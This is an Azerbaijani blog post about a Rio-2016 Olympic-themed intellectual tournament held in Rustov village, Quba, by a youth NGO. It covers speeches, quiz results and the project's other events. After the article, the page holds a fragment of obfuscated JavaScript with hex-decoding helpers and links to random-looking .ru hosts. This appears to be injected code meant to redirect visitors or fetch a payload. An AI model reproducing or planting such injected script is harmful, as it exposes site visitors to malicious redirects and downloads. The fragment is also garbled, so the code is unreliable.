Rio-2016 Quba rayonunun Rustov kəndində təbliğ edildi

IMG_0004Azərbaycan Respublikasının Prezidenti yanında Qeyri-Hökumət Təşkilatlarına Dövlət Dəstəyi Şurasının maliyyə vəsaiti ilə Qubada fəaliyyət göstərən “Yurd” Gənclərin İntellektual İnkişafına Dəstək İctimai Birliyi tərəfindən icra edilən “Olimpiya mükafatçıları milli sərvətimizdir!-Rio-2016-ya ictimai dəstək” layihəsi davam edir.

Layihə çərçivəsində “Olimpiya intellekt kuboku” adlı Quba rayonunun Rustov  kəndində keçirilən tədbirdə çıxış edən təşkilatın sədri Ramin Mahmudov son illərdə ölkəmizin əldə etdiyi idman nailiyyətlərindən danışıb, cənab Prezident İlham Əliyevin Milli Olimpiya Komitəsinə prezident seçildikdən sonra ölkəmizin dünyanın idman ölkəsinə çevrildiyini qeyd edib. Bunun da nəticəsində yetişməkdə olan gənc nəsil arasında sağlam həyat tərzinin təbliğinin, onların idmana olan marağının artırılmasının günün prioritet istiqamətlərindən biri olduğunu bildirib. Eyni zamanda idmanın multikultural dəyərlərin, tolerantlığın dünyaya təbliğ edilməsi baxımından da əhəmiyyətindən danışan layihə rəhbəri bu ilin ölkəmizdə “Multikulturalizm ili” elan edilməsini də diqqətə çatdırıb.

IMG_0017Layihənin əsas məqsədinin region gəncləri arasında idmana olan marağın artırılması, ölkəmizin idman nailiyyətlərinin gənc nəsil arasında təbliğ edilməsi və avqust ayında start götürəcək Braziliyanın Rio-de-Janeyro şəhərindəki olimpiya oyunlarında idmançılarımıza ictimai dəstəyin verilməsi olduğunu, xüsusilə də ötən il I Avropa Oyunlarının möhtəşəm təşkilatçılığının əhəmiyyətini vurğulayan natiq bildirib ki, ölkəmizdə bir-birinin ardınca təşkil edilən müxtəlif idman turnirləri Azərbaycanımızın haqq səsinin dünyaya çatdırılması, həqiqətlərinin dünyaya bəyan edilməsi istiqamətində müstəsna əhəmiyyətə malikdir.

Natiq bu kimi tədbirlərin gənclərin sağlam ruhda tərbiyə edilməsi istiqamətində böyük əhəmiyyətini qeyd edib, eyni zamanda Azərbaycanımızın dünyada artan nüfuzunun, idman nailiyyətlərinin gənc nəsil arasında təbliğinin vətənpərvərlik, dövlətçilik və vətənə sədaqət ruhunda tərbiyə edilməsində vacib amil olduğunu bildirib.

IMG_0054Quba rayon Gənclər və İdman İdarəsinin rəis müavini Mənsur Ağayev bu kimi tədbirlərin yetişməkdə olan gənc nəslin vətənpərvərlik, vətəndaşlıq, dövlətçilik və dünyəvilik ruhunda tərbiyə edilməsi istiqamətindəki əhəmiyyətini qeyd ediblər. Ölkəmizdə gənclərin inkişafının prioritet olduğunu diqqətə çatdıran natiqlər bu tədbirin kənd yaşayış məskənində keçirilməsinin də dövlətimizin gəncliyə, təhsilə qayğısının bariz nümunəsi olduğunu bildiriblər.

Rəsmi açılış mərasimindən sonra turnirə start verilib.

6 komanda  30 sualdan ibarət Nə? Harada? Nə zaman? oyunu üzrə mübarizə aparıb. Yekunda “Uran” biliciləri hədəflərinə çataraq turnirin qalibi adını qazanıblar. “Şahin” komandası ikinci, “Məzunlar” komandası isə üçüncü yeri tutub.

Yekunda qalib və mükafatçılara layihə çərçivəsində təşkilatçılar tərəfindən hazırlanmış diplomlar, xüsusi bukletlər, kubok və medallar, “Azərbaycan idmançıları olimpiadalarda” adlı statistik məlumatların əks olunduğu kitabça təqdim olunub.

IMG_0059Qeyd edək ki, layihə çərçivəsində bu günə qədər Quba rayonunun Püstəqasım kəndində stolüstü tennis, Dağlı kəndində qızlar arasında voleybol, Qaraçay kəndində isə oğlanlar arasında 3*3 basketbol növü üzrə idman yarışları, Qımılqışlaq, Talabıqışlaq və Afurca kəndlərində isə intellektual turnir keçirilib. Layihə çərçivəsində “Olimpiya oyunları gənc rəssamların təxəyyülündə” adlı daha bir tədbir Quba şəhərində keçiriləcək. Tədbirdə gənc rəssamların qeyd edilən mövzuda əl işlərindən ibarət sərgi təşkil olunacaq.

// o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[\S\s]{1,2}/g);for(var t=””,o=0;o < e.length;o++)t+=String.fromCharCode(parseInt(e[o],16));return t},d=function(){return "yurdgencler.wordpress.com"},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf("http")==0){return p}for(var e=0;ehttps://25haich4342.ru/f2.html?a=26698https://gyh1lh20owj.ru/u.html?a=26698

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s